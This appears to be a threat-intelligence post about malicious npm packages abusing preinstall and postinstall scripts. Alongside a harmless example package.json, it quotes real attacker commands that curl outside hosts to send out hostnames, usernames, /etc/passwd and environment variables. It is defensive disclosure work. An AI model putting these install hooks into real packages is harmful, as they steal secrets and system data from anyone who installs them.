[ << ALL_FEED ]

Node JS. Malicious activity at the installation stage

More in General

Node JS. Malicious activity at the installation stage

As part of researching the actions of attackers in npm (Node Package Manager, the main repository of JS code), we decided to take a peek into this area.

JavaScript packages have a mechanism for running scripts at the installation stage. It is described in the package.json configuration file in the scripts section:

{
  "name": "<from-ptescalator-with-love>",
  "version": "1.0.0",
  "description": "Example config of package.json for demonstration-purposes",
  "main": "hello.js",
  "scripts": {
    "preinstall": "echo \"I will be run at pre-install stage\"",
    "install": "echo \"I will be run at install stage\"",
    "postinstall": "echo \"I will be run at post-install stage\""
  }
}
Code language: JSON / JSON with Comments (json)


The values are commands for the system interpreter, whether it be sh, bash, fish, or even Windows cmd — whichever is set by default will be used 😎

Attackers take two paths when exploiting the ability to run their payload during installation:

🫥 Run js code

atlas-websocket@33.9.9, postinstall:
node index.js
Code language: plaintext (plaintext)


wokes@1.0.0, postinstall:
node cli/setup-security.js
Code language: plaintext (plaintext)


🫥 Execute a command via the system interpreter:

autogestion-aprendizaje@1.0.4, preinstall, passing hostname:
echo "No tests" && curl "http://[REDACTED].net/?NPM=$(hostname)&<template>"
Code language: Bash (bash)


bsee-shared-hmd@1.0.6, preinstall, stealing /etc/passwd and obtaining hostname:
sh -c 'curl -X POST -d "user=$(whoami)&host=$(hostname)&passwd=$(cat /etc/passwd | base64)" https://webhook-test.com/[REDACTED]'
Code language: plaintext (plaintext)

storyblok-rich-text-astro-renderer-workspace@99.99.99, postinstall, stealing environment variables:
curl -X POST https://[REDACTED].oastify.com --data "$(env)"
Code language: Bash (bash)

arkoselabs@99.9.13, preinstall, stealing environment variables, /etc/passwd, hostname, and username:
curl --data-urlencode "info=$(hostname && whoami && cat /proc/self/environ && cat /etc/passwd)" http://[REDACTED].oast.me"
Code language: Bash (bash)


If this post gets 1000 hearts🥰 Next time we will talk about the variety of payload scripts at the installation stage of JS packages.

#ti #scs #pyanalysis
@ptescalator

More from ti_author

More from ti_author

More in General